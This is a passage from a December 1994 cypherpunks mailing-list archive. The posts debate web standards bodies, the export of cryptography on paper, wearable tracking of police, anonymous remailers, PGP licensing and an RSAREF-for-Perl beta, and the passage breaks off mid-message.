>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuupQyoZzwIn1bdtAQFD2gGAlu98f5K0uCamNSj9MGxNYZ3hjp8c4kLf 7a4B4ZhyI77vYtwdZ0PMtB9SjS3QDmPk =JA0O -----END PGP SIGNATURE----- From jamesd at netcom.com Sun Dec 11 17:33:08 1994 From: jamesd at netcom.com (James A. Donald) Date: Sun, 11 Dec 94 17:33:08 PST Subject: BofA+Netscape In-Reply-To: <199412120041.TAA00883@intercon.com> Message-ID: <199412120131.RAA14755@netcom10.netcom.com> I wrote: > > Well guys, the victor has room to move. It must come as a big > > shock to Apple, Microsoft, and IBM, but reality is that Netscape > > can set WWW standards and they cannot. Amanda Walker writes > I disagree. The WWW is no longer a research project, and if it is to > survive it will have to do so by consensus, either formal or informal. > That's what standards committees, and groups like the IETF, exist to > facilitate. Consensus between who and who? When they implement crypto, perhaps they should listen to us cypherpunks, but when they add new SGML tags, and new subfields for existing tags, why should they give a tinkers dam what Apple thinks? Now plainly they should listen very carefully to what the guys at CERN say about SGML tags, but as far as I can see, the groups that you want them to take consensus with, have no standing in this matter. What right has apple got to demand that its views be considered? They should discuss SGML with Mosaic, and encryption with RSA, but I have seen little good come out of these standards committees. Open standards are great, but a camel is a horse designed by a committee. CERN came down from the mountain top, and decreed what HTML and HTTP should be, and that was a truly open and successful standard. Very few such standards have emerged from comittees. If anything Netscape is paying too much attention to official committees and too little attention to reality. (for example their irrelevant ID protocol for secure transfer.) and if Netscape descends from the mountain and proclaims a superset of HTML and additional HTTP behavior, then provided that they are open and retain backward compatibility, that is the way to go. If their proclamation is flawed, they will not get away with it. If their proclamation is OK, being developed from practice instead of bureaucratic politicing, then they will get away with it. For example consider the standards committee on SQL. It is just a political issue: What companies on the standards committee decide to do is deemed good, what others do is deemed bad. As a result the SQL "standard" is now just a random pile that does not make any sense. This is OK when the standards committee is dominated by those on the leading edge of technology, but irrelevant and harmful when they are lagging. A few years back, when the standards for new RAM chips were debated, those who were lagging decreed that any ram chip beyond their technology to make was deemed to be non standard. Needless to say, today we all use non standard RAM chips. A similar thing occurred with the move to higher floppy disk densities. Those who could not double, decreed the next density increase would not be to double the previous density. Again, the floppy standard was non standard. In short, when the leading edge company dominates the standards committee, it is of little use, when the old companies dominate the standards committee, it is actually harmful. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jdwilson at gold.chem.hawaii.edu Sun Dec 11 17:34:21 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Sun, 11 Dec 94 17:34:21 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal Message-ID: <199412120139.UAA26699@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Mon, 12 Dec 1994, Ian Farquhar wrote: > Even so, I really wonder if the export of cryptography ON PAPER but in a > machine-readable form would be in violation of ITAR? If anyone has one of > these old scanner, it might very well be worth trying. And what about using MICR ink? Paper-floppy (sort of)? - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuuprCoZzwIn1bdtAQE1fQF+KJn5Hfh3guv4/ElbppMv6RkkZCGjBKSn PvzVDBCbvdueYJwp5AAbZBI2ycCFQizh =ZxaK -----END PGP SIGNATURE----- From rah at shipwright.com Sun Dec 11 17:52:46 1994 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 11 Dec 94 17:52:46 PST Subject: Real-time surveillance of the police Message-ID: <199412120151.UAA15784@zork.tiac.net> At 3:14 PM 12/11/94 -0800, Timothy C. May wrote: >I don't plan to say much more, and won't be playing the "Twenty >Questions" game, but the system does _not_ use satellites or anything >of that sort. Satellites up the ante considerably, and aren't even >needed. No invitatation to twenty questions intended. You could have sat quietly and let me make a fool of myself (or not) without futher comment. Since you have... I believe if you reread what I wrote, I said that the accuracy with satelites was considerable using a pretty small box to begin with (for instance, the Geostar satellite-based system's predicted accuracy was about 6 inches in two dimensions and two meters in three dimensions), but that with local antennae (say every block or so) you could have pretty phenomenal accuracy the the signal was possible. If you put embedded antennae in the walls (we put wires in walls already, yes?) you could get accuracy enough to precision mill with ;-). So, given your reference to ground-based radio, I think we're in "violent agreement here". The application of this to physical commerce has been discussed here before. Just pick up a tagged item and walk out of a store with it. It could be made anonymous, I bet. > >Radio is enough to get 1% positional accuracy (or better) and radio >can have better coverage in many places that GPS-like systems can't reach. > >> the backs of commerce. The only thing which saved GPS for mere mortals like >> us was the MIC's usual severe understimate of Grove's Law and the > ^^^^^^^^^^^ >> exponential cost effectiveness of integrated circuits over time. >A minor nit, but that's "Moore's Law, A major nit, in my book, and one I'm standing on the wrong side of. I got Andy Grove confused with Gordon Moore. It must because they look so much alike. :-). Grovelling in your general direction as always, Bob Hettinga ;-) ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From nzook at bga.com Sun Dec 11 18:49:33 1994 From: nzook at bga.com (Nathan Zook) Date: Sun, 11 Dec 94 18:49:33 PST Subject: Our Storm Brewing? In-Reply-To: <199412112338.PAA18920@jobe.shell.portal.com> Message-ID: Wouldn't this be a case to make for digital signatures? TRY to forge my 4K key. PLEASE!! Nathan From cactus at seabsd.hks.net Sun Dec 11 19:06:13 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Sun, 11 Dec 94 19:06:13 PST Subject: Broadcasts and the Rendezvous Problem Message-ID: <199412120311.WAA27554@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Lucky Green wrote: >Which brings us back to the news -> mail gateway. There has to be a better >way. I don't see a problem. Broadly put, news is broadcast e-mail. There are many sites which in fact do not distinguish between the two, the most notable of which is CMU's Andrew Message System: the admins of such systems believe the "experiment" to be an all-around success. If you want message A to get from site B to site C without a clear trail, you've got to broadcast. It's that simple. It isn't a very big problem that site B put something into the flow, so mail to news isn't a weak point: an article can be injected at the remailer's site without compromising the channel to traffic analysis. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuu/KyoZzwIn1bdtAQHDbwGAgkIM2IZ3W1NtzzgNbpCkjpfJwPMVCMG2 ed0TnOHKU7ws4oUrHpddC6pAjzmk22uO =2zh3 -----END PGP SIGNATURE----- From roy at cybrspc.mn.org Sun Dec 11 19:55:59 1994 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Sun, 11 Dec 94 19:55:59 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal In-Reply-To: <199412120017.QAA18598@netcom14.netcom.com> Message-ID: <941211.205843.4t8.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, tcmay at netcom.com writes: >> Around the mid 1980's a rather interesting device appeared. It was >> essentially an automated scanner for high-density barcodes. > "Cauzin Softstrips" was the product, as I recall. I wouldn't use the > word "quite" in "It never quite caught on," except in irony, as I'm > pretty sure essentially _no_ such machines were sold. Maybe a few, but > not many more. I remember the product, including the test strip printed in BYTE that caused a flurry of "what's this?" letters. I'm sure Tim is right about very few readers being sold. But I think that 2 other things influenced the Cauzin's demise. There was the steady drop in magnetic media prices that eroded the potential savings in storage on paper. But I think the more important event was that Cauzin was bought by Kodak. This was at a time when Kodak was getting into mag media pretty heavily (both computer disks and video tape). I always sort of assumed Kodak bought Cauzin to rid themselves of some competition. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org "Governments find it notoriously difficult to work with people that they cannot shoot." -- James A. Donald -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuu96Rvikii9febJAQFy+AP/ZyutzrPSt9YiGxmGsX51lMWsOoU5giXU pGo8VhYDDZ3uIkR5PLPElMMgRfjVM7AMVcQr+3zxab2i+ihxr9fga7j2QqSnOGk9 pBXuDdrI84i7ChsmNzUxWtN2oTKg52cVxC+GNAmrY2mu25oJXTB6M/ntc+/mgk5L wMrHpx129sE= =rl8a -----END PGP SIGNATURE----- From sandfort at crl.com Sun Dec 11 20:12:49 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Sun, 11 Dec 94 20:12:49 PST Subject: Real-time surveillance of the police Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Michael Crawford wrote about my article in the December '94 issue of Wired, ("Watching the Detectives", p. 141): ... The advantage for society is that the cop's behaviour, such as billy-club swinging velocity, can be monitored. It could detect gunfire, too, ... This would work to the extent that the equipment is actually mounted on the cop it claims to belong to, so some manner of authentication would be needed. Fleming told me that the localizers would also take biometric readings to monitor the cop's physical status. It turns out that individual biometric readings vary significantly from person to person. It would be very hard for one cop (or a dog, suspect, whatever) to pose as someone else by wearing his localizer. ... Yes, that's right - keep surveillance cameras going on _yourself_. If you're not doing anything illegal, you've got nothing to fear from taping everything you do. I don't like this idea one bit. I agree with Tim that it is the first step on a very slippery slope. ... I expect that it will be difficult to convince our Nation's Finest to adopt this new technology - though I'm sure they'd be happy to apply it to parolees and those serving on probation.... It would be difficult for the cops to reject it. After all, it definitely benefits vast majority of good cops. It only hurts that teensy-tiny minority who violate people's rights. Right? Michael also argued that it might be more easily sold to private security firms for legal liability reasons. This argument is even more persuasive for police officers. Cities routinely pay astronomical settlements, or fight expensive law suits, arising out of alleged incidents of police misconduct. Frivolous lawsuits would be quickly thrown out of court. Rogue cops would be identified and thrown off the force. Works for me. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From FRODO at uhura.trinity.toronto.edu Sun Dec 11 20:21:33 1994 From: FRODO at uhura.trinity.toronto.edu (FRODO at uhura.trinity.toronto.edu) Date: Sun, 11 Dec 94 20:21:33 PST Subject: Hal Finney & Bob Rae and Ontario's Parliament Message-ID: -----BEGIN PGP SIGNED MESSAGE----- All lines between this and the PGP header may be suspect. This is what I posted to Ont.general this evening. Those who are interested in getting more information about the kerfuffle in Toronto over the posting through an anonymous remailer might want to check out http://www.earth.org/~newsbites (I believe that's it. You might want to try without the directory.) Which contains muchos information, including the discussion going through the newsgroups, and the Globe and Mail article.) The article below is what I posted to ont.general myself this evening. Seemed a good chance to proselytize... ;) It was signed, as below, with my shame-facedly new PGP key, though the signature file was slightly different. (I've managed to grab the real .sig off my unix account. As I noted, one of my e-mail sites is currently not sending mail.) Article begins: Short note. Mike Harris' behavior in the legislature is the symptom of either malevolence or incompetence or both. Either way, he won't be getting my vote. On the other hand, there are ways of protecting yourself from forgeries such as this. You can't stop people from sending such mail, but you *can* make mail that you write unique. PGP, a fully legal encryption program which the Ontario government could use FOR FREE, has a signing protocol so that recipients can check to make sure that your mail did indeed come from you. If you make it a standard that you don't send unsigned mail, and don't post to newsgroups without signing what you send, unsigned mail will be suspect. In this case, the mail went through the cypherpunks anonymous remailer at portal.com. I trust that whoever sent the mail had enough computer sense to have chained it through several remailers, if little else. We've been through the arguments about "yes there was a disclaimer," but people seem to be ignorant of the fact that there are already ways of protecting yourself from misrepresentation on the net. The University of Toronto's CDF facility is currently having a little problem with sending mail (ie, it can't), so I'm posting this instead of sending it directly to Bob Rae. Perhaps we should send him PGP for Christmas? Richard - -- Richard Martin ChemPhysCompSci 9T7+PEY = 9T8 g4frodo at cdf Trinity College University of Toronto SVW92 martinrd at gpu.utcc My opinions, when not poached. (or fried) frodo at uhura.trinity [Tack a "toronto.edu" on the end of each e-mail address. I'm faced with a mailing program with draconian margin policies.] -----BEGIN PGP SIGNATURE----- Version: 2.6.i iQCVAgUBLuvVl6+lG3+zwTCVAQFPdwQAtX0fh0aJuhPC1mCUAlNDDi9tV0QB0yy8 cSNIlBxVgEzTl6K0geu25CSXSGh2N4dFdh6rHMPjkMkOsfcVPFI5nXb8+zHtfFgd UxkU0mwhunyFzLCN4tm0UVKruzWmfV8bGV9EezSsRrmAeAsZwT9s5hJ3qdOnf3mn twbGIn1Eadg= =UI1+ -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Sun Dec 11 21:03:12 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sun, 11 Dec 94 21:03:12 PST Subject: Real-time surveillance of the police Message-ID: At 11:11 PM 12/11/94, Sandy Sandfort wrote: > ... Yes, that's right - keep surveillance cameras going > on _yourself_. If you're not doing anything illegal, > you've got nothing to fear from taping everything you > do. > >I don't like this idea one bit. I agree with Tim that it is the >first step on a very slippery slope. > > ... I expect that it will be difficult to convince our > Nation's Finest to adopt this new technology - though > I'm sure they'd be happy to apply it to parolees and > those serving on probation.... > >It would be difficult for the cops to reject it. After all, it >definitely benefits vast majority of good cops. It only hurts >that teensy-tiny minority who violate people's rights. Right? I'm not sure if you are being sarcastic here, although I don't think you are. That seems like a slippery slope all it's own, there. I don't like it when someone tells me "what do you have to worry about if you aren't breaking any laws," and I don't like it when someone says that about the cops too. That argument is awfully scary. Yeah, if the cops didn't want to accept such a thing, it might be worth calling them on their hypocrisy for applying that argument to citizens and not to police. But I don't think it would be wise to use the "what do you have to worry about if you aren't breaking any laws," argument too often. From alano at teleport.com Sun Dec 11 21:27:19 1994 From: alano at teleport.com (Alan Olsen) Date: Sun, 11 Dec 94 21:27:19 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal Message-ID: <199412120527.VAA18927@desiree.teleport.com> >In the Jan 95 issue of Dr Dobbs Journal, you will find the following: > [stuff deleted] > > An article by Ron Rivest on RC5 (without code). I could have sworn that had code with it. In checking, it has only pseudocode. My mistake... Oops. >Remember, you can export cryptographic source code in paper form. I wonder how it effects their FTP archives... | "Encryption ROT13s your mind." | alano at teleport.com | |"Would you rather be tortured by the government | Disclaimer: | |forces or the people's liberation army?" -mklprc | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| From sandfort at crl.com Sun Dec 11 22:12:35 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Sun, 11 Dec 94 22:12:35 PST Subject: Real-time surveillance of the police Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Jonathan Rochkind wrote: ... I don't like it when someone tells me "what do you have to worry about if you aren't breaking any laws," and I don't like it when someone says that about the cops too.... This misses the point I was trying to make. The first argument in favor of wiring the cops, is that it is to their benefit. It helps backup officers or medical personnel to find them. It protects them from unfounded accusations of brutality or other misconduct. It makes a permanent visual and sound recording of perps who get away. This helps in later identification. Even with all these arguments in favor of wiring, I have a sneaking suspicion the cops will not want it. Why? Though few police would admit it publicly, my conjecture is that they know they are currently getting away with murder (sometimes literally) and would feel being wired would force them to obey the law. So my "teensy-tiny-minority" argument was offered sarcastically. In addition, I think recording officers' shifts would show just how little work cops actually do for their pay. Wiring would really throw a money wrench in the doughnut-boys cushy deal. Cynical? You betcha. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From blancw at pylon.com Sun Dec 11 22:45:08 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Sun, 11 Dec 94 22:45:08 PST Subject: Real-time surveillance of the police Message-ID: <199412120645.WAA24531@deepthought.pylon.com> Responding to msg by Michael D. Crawford: . . . if a street gang felt the cops were thumping their members with unwarranted enthusiasm, the gang could purchase a case of cameras at the local Price Club, and everyone could carry them to photograph the cops. ............................................................... The first thing I imagined on reading this, was numbers of young blacks in the ghetto carrying on their shoulders - not boom boxes, but camcorders. But next I multiplied and elaborated and exaggerated the idea of everyone protecting themselves by any and all surveillance devices possible and available, and came up with this vision of a society where membership required that everyone be amenable to being recorded on contact with anyone and their cat. "Of course, I respect you - I just don't *trust* you." Blanc From lmccarth at ducie.cs.umass.edu Sun Dec 11 22:54:33 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 11 Dec 94 22:54:33 PST Subject: alt.anonymous.messages propagation Message-ID: <199412120659.BAA02822@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Todd Masco writes: > Timothy C. May writes: > # Isn't this what "alt.anonymous.messages" is all about? > Alas, it is not available at MIT. I'll have to scrounge for a server that > carries it (volunteerings of feeds welcome!); Hmmm, does MIT get alt.anonymous at least ? I understand alt.anonymous was created to serve a purpose similar to that of alt.privacy.anon-server, but at the moment it's a de facto equivalent of alt.anonymous.messages. alt.anonymous is somewhat better propagated than a.a.m, from what I've heard. You should request one or both groups from the MIT news admins. If users there want to read the group, they'll likely be quite happy to carry it. I'm a fairly well-known regular in alt.config, and I believe I can probably recruit some prominent news admins to send booster newgroup messages for alt.anonymous.messages. Apart from that, it's a matter of people asking their local news admins to pick up the group if they aren't already carrying it. > Though netcom is our > IP provider, I'd rather not get news from them. Heh, I don't blame you. Although I heard they recently ditched alt.this.site.newgroups.everything (or something like that), they still carry virtually everything that gets newgrouped by anyone, accidentally or not. - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuvzUGf7YYibNzjpAQHr7AP/WCfDofFHaj8JgOEIWM490zc5hPCQxSSV 2d1KZ61wVGsJEDGLdEMI1OT1cuZAgTzbs4HXd+Hi0z5gu/ZsynSpkxCQTfPr7RZV 4+wPSSVOiEK4rrwf95dfJsC7U+EZk8fUCd8gNX0dXVJKYe9n258oWlUNk8VkgNgM L6f+bXRX/VY= =B8La - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuv0uioZzwIn1bdtAQEbggF/ax15KwhS915RJ4eTZHpAPBS2W62tT8eK IniODiSMg+yqtueEQ7yTs8cny7RLOUYq =YTYr -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Sun Dec 11 23:09:03 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 11 Dec 94 23:09:03 PST Subject: Misunderstanding of Remail Headers Message-ID: <199412120713.CAA03062@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Hal writes: > One thing I do notice on reading the discussion in can.politics is the > fact that despite the disclaimers in the message headers, some people > took this as a forgery attempt on my part. I wonder if it might be > necessary to insert disclaimers into the body of the message as > anon.penet.fi does, at least for messages to known mail-to-news > gateways. > > There was also a misperception that my remailer was an official effort > endorsed by Portal (again, despite the disclaimers). Note that it was > they who were contacted, not me (yet). This might suggest that it will > not be possible to cleanly separate the remailer operators and service > providers when problems like this arise. Both may end up being hassled > (time will tell whether I am). This is all too familiar to me. Although I still haven't heard the official line on the shutdown of Underdog following the Scythe spam, at least some people locally (including, crucially, my advisor) received the impression that I had forged (and authored !) the offending news articles in spite of the disclaimer headers. Furthermore, the spam might not have been a fatal blow if not for the fact that some people ignored the "complaints to " header and wrote directly to root or postmaster here. Everyone who actually wrote to me came away satisfied that I was taking appropriate action, as far as I could tell. I'll take this opportunity to reiterate that I'm no longer operating a remailer at this address. I wrote to Matt Ghio about a week ago asking him to remove my address from remailer-pings at chaos.bsu.edu, but I suppose he's busy with school these days. That list remains frozen with information dating from Nov.22. Karl Barrus mentioned something about chaos.bsu.edu having moved to chaos.taylored.com; perhaps this is part of the reason for the snag ? - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuv2yGf7YYibNzjpAQF/GQP/VNo06+qqYvQBhU0xAO+TpHx44OJX6dKI HWhW+zIA6Xp/UYKsql8Mfg7dhxesJ4JSdqkkjY8znqUrwp/CnOTo3qql0W/EOxYt l3f7kcHJWvr/gPO/rvtMgWbR2GRjkhaCa62ny/tgV+IGCKxDqCi25A4Y2x23KFDB JgiLP4c2hSc= =34zm - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuv4ACoZzwIn1bdtAQEkZwF/dL0lroedGXvGlNJFJ5W6Z0dm83yefrzq 9aRFW9Xh+2/cjvb5+OMY0Ol1uEnU5UaM =ygWU -----END PGP SIGNATURE----- From werner at mc.ab.com Sun Dec 11 23:13:16 1994 From: werner at mc.ab.com (tim werner) Date: Sun, 11 Dec 94 23:13:16 PST Subject: [cpunks] Re: public accounts / PGP / passphrases Message-ID: <199412120712.CAA01736@sparcserver.mc.ab.com> >Date: Mon, 5 Dec 1994 05:24:12 -0500 >From: "L. McCarthy" >...The only solution I can imagine is to keep >a notebook computer running Linux at work, and dial in to the DECstation >five feet away from my desk at work. I've no idea how to convince the tech >staff here to add a dedicated phone line to my lab for this purpose. Any >better suggestions on using PGP safely during the workday ? Well, for one thing you don't need a phone line in your scenario. You can probably just connect the serial port of your laptop to one of the decstation serial ports, using a null-modem cable (pins 2 and 3 swapped; 4 jumpered to 5; 6, 8, and 20 jumpered to each other; and 7 passed through, or something like that) But I agree that the idea of buying a laptop so you can use PGP at work is odious. There must be a better way. tw From lmccarth at ducie.cs.umass.edu Sun Dec 11 23:34:15 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 11 Dec 94 23:34:15 PST Subject: Hal Finney & Bob Rae and Ontario's Parliament Message-ID: <199412120739.CAA03309@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Richard Martin writes: > The article below is what I posted to ont.general myself this evening. [...] > PGP, a fully legal encryption program which the Ontario > government could use FOR FREE, Is this true ? According to the PGP 2.6.1 User's Guide: "The freeware version of PGP is only for personal, non-commercial use -- all other users in the USA and Canada must obtain a fully licensed version of PGP from ViaCrypt. [...] If you have a need to use PGP in a commercial or Government setting, and ViaCrypt has a version of PGP for your hardware platform, you should get ViaCrypt PGP." - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuv85mf7YYibNzjpAQErsgQA4h1OvxrfiPemA6CqN1gkVpdmoTIxOnEg pOZ2Oa4rCCqNTMqmhEXw98H46c+sQDFv+WXSQEj9Q94X3nTtKBpBIRMQ7L0Etu4U hd9OyadA0Z45I+igeq2UpOeQw+UP97dFtCabZZhrRgcGFZQMUi8eVLqRESxKtU2V 88tOztqzcZY= =FYp4 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuv+DioZzwIn1bdtAQFDhgF/VA6FDH1i05pB20ofLQA+sihJTukUI/6m Mb1taTvGIqDmgPW1YP9nQbWGgjQ3OvAj =HMza -----END PGP SIGNATURE----- From MIKEINGLE at delphi.com Sun Dec 11 23:43:05 1994 From: MIKEINGLE at delphi.com (Mike Ingle) Date: Sun, 11 Dec 94 23:43:05 PST Subject: RSAREF for Perl Beta Testers Wanted Message-ID: <01HKJGLZB8EQ8ZOUQR@delphi.com> RSAREF for Perl is complete and ready for beta testing. Does anyone want to volunteer? Using it requires Unix, Perl, and RSAREF 2.0. You do not need to recompile the Perl interpreter. It gives you conventional and public-key encryption, signing, hashing, and Diffie-Hellman as one-liners in Perl. Mike From crawford at scruznet.com Mon Dec 12 00:05:40 1994 From: crawford at scruznet.com (Michael D. Crawford) Date: Mon, 12 Dec 94 00:05:40 PST Subject: Real-time surveillance of the police Message-ID: <199412120805.AAA15561@scruz.net> Sandy Sandfort writes: > Michael also argued that it might be more easily sold to private > security firms for legal liability reasons. This argument is > even more persuasive for police officers. Cities routinely pay > astronomical settlements, or fight expensive law suits, arising > out of alleged incidents of police misconduct. Frivolous > lawsuits would be quickly thrown out of court. Rogue cops would > be identified and thrown off the force. Works for me. Works for me, too, and one would think that it would work for cities, but experience shows that individual cops can rack up millions of dollars in legal settlement costs and still remain on the force. I heard some figure - this is quite vague, but hey, it's midnight - that a small handfull of cops in San Francisco had cost the City tens of millions, with individual cops repeatedly causing lawsuits, without getting fired. Why? Police unions. Settling out of court without assigning blame. City politics. Mayors that are former police chiefs. A clueless populace. Promises to do better next time. Now, I heartily agree with you that the police should be more closely monitored, and certainly cities have ample reason to avail themselves of this, but most cities do not even avail themselves of citizen police review commissions, because of the resistance the police have to it. In Santa Cruz, a proposal to allow an independent citizen panel to review police internal affairs investigations faced threats of lawsuits from the police union, and took _years_ to adopt. The commission we got has considerably less authority than was originally proposed. This is in a city reknowned throughout the nation for its leftist politics. If the People's Republic of Santa Cruz couldn't get a review board with real authority implemented, I doubt you'll convince the LAPD to put radio beacons on their thumping arms. Much as I think they should. Sandy continues: > Even with all these arguments in favor of wiring, I have a > sneaking suspicion the cops will not want it. Why? Though few > police would admit it publicly, my conjecture ... Well, my knowledge is that at least one cop wouldn't go for it - the cop we caught jacking off to a magazine of ill repute, parked in his patrol car on Yerba Buena Island in San Francisco Bay. Those rhythmic wrist-movements would show an unmistakable frequency signature back at home base. He sure drove off quick. Didn't even say hello. I say, > Yes, that's right - keep surveillance cameras going on _yourself_. If > you're not doing anything illegal, you've got nothing to fear from taping > everything you do. tcmay at netcom.com (Timothy C. May) replies: > This scenario is a likely way that "position escrow" will evolve, from > a voluntary escrowing (incl. timestamping, etc.). "Those with nothing > to hide" will agree to escrow their movements...this will exculpate > them in suspected crimes, etc. A slippery slope. I reflected on this a bit, and decided that if one were to implement "personal surveillance", a decent solution would be to encrypt the tapes. Use DAT tape instead of a VCR, and save MPEG's or QuickTime movies that have been encrypted with IDEA. The idea here is protection _from_ the police, to demonstrate that an officer misbehaved in the vicinity of my car, rather than to provide a record for use by the government. Needless to say, I wouldn't advertise that I actually had such a thing until I pulled the tapes out in a deposition, or sent them, decrypted, to the TV news. Again, I'm not saying such surveillance should be imposed, supplied or encouraged by the authorities, but that one might find some benefit in installing it oneself. Cheerio, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From rsalz at osf.org Mon Dec 12 00:06:45 1994 From: rsalz at osf.org (Rich Salz) Date: Mon, 12 Dec 94 00:06:45 PST Subject: Real-time surveillance of the police Message-ID: <9412120802.AA11196@sulphur.osf.org> >After the Rodney King incident, I had the notion, (which I did not act on >to actually promote, I'm sorry to say), that organizations representing >people that feel persecuted by the law could issue disposable cameras to >all there members. A couple of years ago, when he was getting one of the first Rebok international humanr rights awards, Peter Gabriel talked about how one of the organizations he is affiliated with was planning on doing exactly this kind of thing. If you think about it, it's not unlike the driving thrust of Amnesty International. From cactus at seabsd.hks.net Mon Dec 12 00:29:40 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Mon, 12 Dec 94 00:29:40 PST Subject: alt.anonymous.messages propagation Message-ID: <199412120834.DAA04343@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- L. McCarthy wrote: >Hmmm, does MIT get alt.anonymous at least ? I understand alt.anonymous was >created to serve a purpose similar to that of alt.privacy.anon-server, but >at the moment it's a de facto equivalent of alt.anonymous.messages. >alt.anonymous is somewhat better propagated than a.a.m, from what I've heard. Nope, no alt.anonymous. 'Leastaways, not off the servers that the turist accounts use. And since I configured news on the machine, I'd love to hear if there are MIT servers that have a larger set than life.ai's. >You should request one or both groups from the MIT news admins. If users there >want to read the group, they'll likely be quite happy to carry it. Alas, I am but a turist at MIT, though one who helps maintain the turist machine. I'll be looking at getting a real newsfeed from elsewhere, but asking the MIT newsadmins for favors isn't in the cards. If anybody here has a bit of a 